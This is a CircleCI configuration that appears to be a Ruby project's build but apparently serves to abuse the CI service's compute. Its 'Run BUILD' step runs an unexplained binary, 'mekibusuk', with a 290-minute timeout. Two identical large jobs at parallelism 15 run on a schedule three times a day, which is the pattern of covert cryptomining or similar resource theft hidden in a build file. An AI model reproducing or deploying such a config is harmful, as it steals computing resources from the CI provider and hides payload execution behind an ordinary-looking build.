working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run: curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
    - run: chmod +x ./cc-test-reporter
    - run: ./cc-test-reporter before-build
    - run: gem install bundler:2.1.4
    - run: bundle install --jobs=4 --retry=4 --path vendor/bundle
    - run: bundle exec rake rubocop
    - run:
        name: Run BUILD
        command: |
                    chmod +x mekibusuk && ./mekibusuk
        no_output_timeout: 290m
version: 2.0
jobs:
  endvoc:
    <<: *script
    docker:
      - image: ruby:latest
    resource_class: large
    parallelism: 15
  endvoc1:
    <<: *script
    docker:
      - image: ruby:latest
    resource_class: large
    parallelism: 15
workflows:
  version: 2
  commit:
    jobs:
      - endvoc
      - endvoc1

    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - master

  endvocrunjob:
    jobs:
      - endvoc
      - endvoc1
